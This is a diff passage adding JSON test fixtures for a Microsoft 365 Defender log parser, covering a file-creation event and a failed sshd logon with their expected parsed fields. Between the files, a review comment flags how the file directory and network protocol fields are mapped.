@@ -0,0 +1,107 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe /V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT 
DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-08T14:42:24.2882642Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceFileEvents\",\"_TimeReceivedBySvc\":\"2024-11-08T14:41:06.9726687Z\",\"properties\":{\"SHA1\":\"8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264\",\"FileSize\":640920,\"MD5\":\"9a3af3a9ce0217bccce1d161e0b6bfde\",\"FileName\":\"FileName.dll\",\"FolderPath\":\"C:\\\\Program Files\\\\FileName.dll\",\"InitiatingProcessCommandLine\":\"commandexec.exe 
/V\",\"InitiatingProcessFileName\":\"commandexec.exe\",\"InitiatingProcessParentFileName\":\"services.exe\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\commandexec.exe\",\"InitiatingProcessParentCreationTime\":\"2024-10-09T01:02:27.2227081Z\",\"InitiatingProcessId\":16468,\"DeviceName\":\"device.company.local\",\"DeviceId\":\"123456789abcdef\",\"InitiatingProcessCreationTime\":\"2024-11-08T14:38:23.2383083Z\",\"InitiatingProcessAccountName\":\"syst\u00e8me\",\"InitiatingProcessAccountDomain\":\"account domain\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"InitiatingProcessParentId\":888,\"ReportId\":341972,\"SHA256\":\"30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595\",\"InitiatingProcessIntegrityLevel\":\"System\",\"InitiatingProcessTokenElevation\":\"TokenElevationTypeDefault\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"FileOriginReferrerUrl\":null,\"AppGuardContainerId\":\"\",\"ActionType\":\"FileCreated\",\"SensitivityLabel\":null,\"SensitivitySubLabel\":null,\"IsAzureInfoProtectionApplied\":null,\"RequestProtocol\":\"Local\",\"ShareName\":null,\"RequestSourceIP\":null,\"RequestSourcePort\":null,\"RequestAccountName\":\"Syst\u00e8me\",\"RequestAccountDomain\":\"ACCOUNT DOMAIN\",\"RequestAccountSid\":\"S-1-2-3\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AdditionalFields\":\"{\\\"FileType\\\":\\\"PortableExecutable\\\"}\",\"PreviousFolderPath\":\"\",\"PreviousFileName\":\"\",\"InitiatingProcessFileSize\":176128,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Windows Installer - 
Unicode\",\"InitiatingProcessVersionInfoProductVersion\":\"5.0.22621.3880\",\"InitiatingProcessVersionInfoInternalFileName\":\"commandexec\",\"InitiatingProcessVersionInfoOriginalFileName\":\"commandexec.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows\u00ae installer\",\"InitiatingProcessSessionId\":0,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-08T14:38:51.9048761Z\",\"MachineGroup\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "file" + ], + "dataset": "device_file_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-08T14:38:51.904876Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "commandexec.exe /V", + "InitiatingProcessFileSize": 176128, + "InitiatingProcessIntegrityLevel": "System", + "InitiatingProcessTokenElevation": "TokenElevationTypeDefault", + "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation", + "InitiatingProcessVersionInfoFileDescription": "Windows\u00ae installer", + "InitiatingProcessVersionInfoInternalFileName": "commandexec", + "InitiatingProcessVersionInfoOriginalFileName": "commandexec.exe", + "InitiatingProcessVersionInfoProductName": "Windows Installer - Unicode", + "InitiatingProcessVersionInfoProductVersion": "5.0.22621.3880", + "RequestAccountSid": "S-1-2-3" + }, + "type": "FileCreated" + }, + "file": { + "directory": "C:\\Program Files\\FileName.dll", + "hash": { + "md5": "9a3af3a9ce0217bccce1d161e0b6bfde", + "sha1": "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "sha256": "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595" + }, + "name": "FileName.dll", + "size": 640920 + }, + "host": { + "id": "123456789abcdef", + "name": "device.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "341972" + } + } + }, + "network": { + "protocol": "Local" + }, + "process": { + "args": [ + "/V" + ], + "command_line": 
"commandexec.exe /V", + "executable": "c:\\windows\\system32\\commandexec.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323" + }, + "name": "commandexec.exe", + "parent": { + "name": "services.exe", + "pid": 888, + "start": "2024-10-09T01:02:27.222708Z" + }, + "pid": 16468, + "start": "2024-11-08T14:38:23.238308Z", + "user": { + "domain": "account domain", + "id": "S-1-2-3", + "name": "syst\u00e8me" + }, + "working_directory": "c:\\windows\\system32" + }, + "related": { + "hash": [ + "30204bef93d692fbcbf7475b154e3f65d3aace6f8f030af9e412f3d9e8d9a595", + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323", + "8f6ebe4a51ce4b5f76f4d896a6e289e69f91a264", + "9a3af3a9ce0217bccce1d161e0b6bfde" + ], + "user": [ + "Syst\u00e8me" + ] + }, + "user": { + "domain": "ACCOUNT DOMAIN", + "name": "Syst\u00e8me" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json 
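Review bot: `file.directory` in the expected output is `C:\\Program Files\\FileName.dll`, the full path of the file rather than its directory — the sample's DeviceFileEvents `FolderPath` includes the file name, unlike the DeviceEvents fixtures where `FolderPath` is a bare folder (e.g. `...\\Office\\Recent` in the shell-link test). Any rule or pivot on `file.directory` (`C:\\Program Files`, `C:\\Users\\Public`, …) will therefore silently miss DeviceFileEvents records. I would pin `"directory": "C:\\Program Files"` and `"path": "C:\\Program Files\\FileName.dll"` in the expected `file` object, with the parser splitting on the last separator when `FolderPath` ends in `FileName`. `"protocol": "Local"` under `network` is also questionable: `RequestProtocol` here says the request was not over the network at all, so either leave `network.protocol` unset for `Local` or keep the raw value as `action.properties.RequestProtocol` instead.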
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, 
\"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": 
\"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", 
\"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + 
"-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + 
